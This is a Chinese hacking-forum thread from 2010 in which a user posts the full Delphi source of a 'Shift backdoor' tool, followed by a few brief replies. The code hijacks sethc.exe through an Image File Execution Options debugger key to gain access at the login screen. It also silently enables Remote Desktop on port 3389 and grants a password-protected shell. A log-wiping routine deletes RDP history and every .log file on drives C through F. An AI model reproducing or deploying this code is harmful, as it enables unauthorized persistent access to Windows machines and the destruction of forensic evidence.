Board logo

标题: 共享下我的Shift后门 [打印本页]

作者: hyrz    时间: 2010-2-4 13:01     标题: 共享下我的Shift后门

  1. program shiftBlackdoor;

  2. {$APPTYPE CONSOLE}

  3. uses
  4. windows,registry,shellapi;


  5. const
  6. password='adminhy';   //c32asm   OK!

  7. var
  8. shiftvalue:integer;


  9. procedure shift;
  10. var
  11. system:array[0..255]of char;
  12. mefile: array[0..MAX_PATH] of Char;
  13. key:Tregistry;
  14. begin
  15. GetModuleFileName(0, mefile, Length(mefile));
  16. getsystemdirectory(system,255);
  17. Copyfile(mefile,pchar(system+'\ntcsx.bat'),true);
  18. if shiftvalue=1 then
  19. begin
  20. key:=tregistry.Create;
  21. getsystemdirectory(system,255);
  22. try
  23. key.RootKey:=HKEY_LOCAL_MACHINE;
  24. key.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',false);
  25. key.DeleteKey('sethc.exe');
  26. key.CreateKey('sethc.EXE');
  27. key.OpenKey('sethc.exe',false);
  28. key.WriteString('Debugger',system+'\ntcsx.bat');
  29. key.CloseKey;
  30. key.Free;
  31. except
  32. else
  33. writeln('Setup Door Error!');
  34. sleep(1000*60*800);
  35. writeln;
  36. end
  37. end
  38. else
  39. if shiftvalue=2 then
  40. begin
  41. try
  42. key:=Tregistry.Create;
  43. key.RootKey:=HKEY_LOCAL_MACHINE;
  44. key.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',false);
  45. key.DeleteKey('sethc.exe');
  46. Messagebox(0,'Clear OK!','Message',MB_iconEXClamation);
  47. finally
  48. end;
  49. end;
  50. end;

  51. Procedure Open3389;//开3389
  52. var
  53. bat:textfile;
  54. begin
  55. assignfile(bat,'C:\3389.bat');
  56. try
  57. rewrite(bat);
  58. writeln(bat,'@echo off');
  59. writeln(bat,'@echo Windows Registry Editor Version 5.00>>3389.reg');
  60. writeln(bat,'@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg');
  61. writeln(bat,'@echo "fDenyTSConnections"=dword:00000000>>3389.reg');
  62. writeln(bat,'@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg');
  63. writeln(bat,'@echo "PortNumber"=dword:00000d3d>>3389.reg');
  64. writeln(bat,'@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg');
  65. writeln(bat,'@echo "PortNumber"=dword:00000d3d>>3389.reg');
  66. writeln(bat,'@regedit /s 3389.reg');
  67. writeln(bat,'@del 3389.reg');
  68. finally
  69. Closefile(bat);
  70. end;
  71. winexec('C:\3389.bat',SW_hide);
  72. end;

  73. procedure clearlogs; //清除部分日志
  74. var
  75. bat:textfile;
  76. begin
  77. try
  78. Deletefile('C:\3389.bat');
  79. assignfile(bat,'C:\clear.bat');
  80. rewrite(bat);
  81. writeln(bat,'@echo off');
  82. writeln(bat,'@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f');
  83. writeln(bat,'@del "%USERPROFILE%\My Documents\Default.rdp" /a');
  84. writeln(bat,'@echo Clear 3389LOG Success.');
  85. writeln(bat,'Clear Temp Log.');
  86. writeln(bat,'@del C:\*.log /q /s /f');
  87. writeln(bat,'@del D:\*.log /q /s /f');
  88. writeln(bat,'@del E:\*.log /q /s /f');
  89. writeln(bat,'@del F:\*.log /q /s /f');
  90. writeln(bat,'@del %0');
  91. finally
  92. closefile(bat);
  93. winexec('c:\clear.bat',SW_hide);
  94. end;
  95. end;


  96. procedure mem;//功能
  97. var
  98. gl:integer;
  99. begin
  100. writeln('===================================================================');
  101. writeln(' 1.CMD.EXE. 2.EXPLORER.EXE. 3.Clear LOGS. 4.Clear Door. 5.About.');
  102. writeln('===================================================================');
  103. writeln;
  104. write('>>');
  105. read(gl);
  106. writeln('OK...');
  107. if gl=1 then
  108. begin
  109. winexec('cmd.exe /c cls',SW_show);
  110. winexec('cmd.exe',SW_show);
  111. halt;
  112. end
  113. else
  114. if gl=2 then
  115. begin
  116. winexec('explorer.exe',SW_show);
  117. halt;
  118. end
  119. else
  120. if gl=3 then
  121. begin
  122. clearlogs;
  123. sleep(1000*60*1996);
  124. end
  125. else
  126. if gl=4 then
  127. begin
  128. shiftvalue:=2;
  129. shift;
  130. exit;
  131. end
  132. else
  133. if gl=5 then
  134. begin
  135. readln;
  136. writeln('======================Shift Door About========================');
  137. writeln;
  138. writeln('Shift BlackDoor 4.0');
  139. writeln('BY:Hyrz');
  140. writeln('E-mail:bsoom@163.com');
  141. writeln;
  142. writeln('===============================END=========================== ');
  143. readln;
  144. exit;
  145. end
  146. else
  147. readln;
  148. writeln('Command Error!');
  149. readln;
  150. clearlogs;
  151. end;

  152. ///////////////////////////Main/////////////////////////////

  153. var
  154. pass:string;
  155. begin
  156. shiftvalue:=1;
  157. shift;
  158. open3389;
  159. begin
  160. writeln('===============================');
  161. write('Password:');read(pass);
  162. if (pass=password) then
  163. begin
  164. writeln;
  165. mem;
  166. exit;
  167. end
  168. else
  169. writeln;
  170. writeln('Password Error!');
  171. writeln;
  172. writeln('Bye..Bye...');
  173. sleep(2000);
  174. end;
  175. end.
复制代码

作者: 441545795    时间: 2010-2-4 13:27

这是什么哦 好深奥哦
作者: hyrz    时间: 2010-2-4 13:37

这是什么哦 好深奥哦
441545795 发表于 2010-2-4 13:27


呵呵,理解。
作者: 柔肠寸断    时间: 2010-2-4 16:40

编译过来啊。。。
作者: 柔肠寸断    时间: 2010-2-4 16:40

编译过来啊。。。,,,,
作者: hack.晓雨    时间: 2010-2-5 16:46

呵呵。  学习了。, 我也不是很懂




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2